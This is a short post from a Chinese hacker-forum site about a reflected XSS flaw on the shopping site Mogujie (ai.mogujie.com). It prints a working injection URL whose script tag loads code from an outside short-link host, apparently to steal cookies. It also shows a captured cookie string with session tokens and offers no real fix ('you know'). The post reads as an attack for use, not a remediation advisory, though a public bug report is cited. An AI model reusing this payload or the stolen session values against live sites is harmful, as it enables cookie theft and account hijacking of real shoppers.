蘑菇街一处xss直接打cookie - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

蘑菇街一处xss直接打cookie

无法 漏洞预警

漏洞详情:


http://ai.mogujie.com/search/1/pop?minPrice=1&maxPrice=1 minPrice=1 地址http://ai.mogujie.com/search/1/pop?minPrice=%3Cscript%20src=http://t.cn/Rts28iE%3E%3C/script%3E&maxPrice=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E然后再稀松平常的插入  3(FE6$S1F~)B]HNOQHTWLDL.png然后效果就出来了
可以反射
这是我反射出来的cookie :__mgjuuid=9709a8c1-4f1c-05a5-cc65-50c1a46907c2; FRMS_FINGERPRINT=1291502f1bd97b0e7d8000919690eac8f2033f04141100000000000000001281d3d9446802a442592b01dfb94e2c3662ff3d139100000000000000001401b326b5062b2f0e69133119ca14e7ea6328a41201ae38344822f149cb01016fcd79d2626918c71271d3d9446802a442591381b326b5062b2f0e69132168934a3e9455fa721371dfa004ad8ed49872126100000000000000001211acf4b89d3d503d82130187374a5ff147c4561421000000000000000012511ff1de774005f8da1311e2a78ed30c66e16a1361000000000000000012419e984c108157cea712219e984c108157cea71341e4da3b7fbbce23451231fc49306d97602c8e135133e75ff09dd601bb; from_site=%5E20140223loginsmall; _mg_tk=ebf1abe414; _OkLJ_%UJ=N4LRRUV6Z33OATGA可不可以储存我就不清楚

修复方式:

你们懂得

案例:https://www.vulbox.com/bugs/vulbox-2016-071682
          

标签: 暂无标签

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表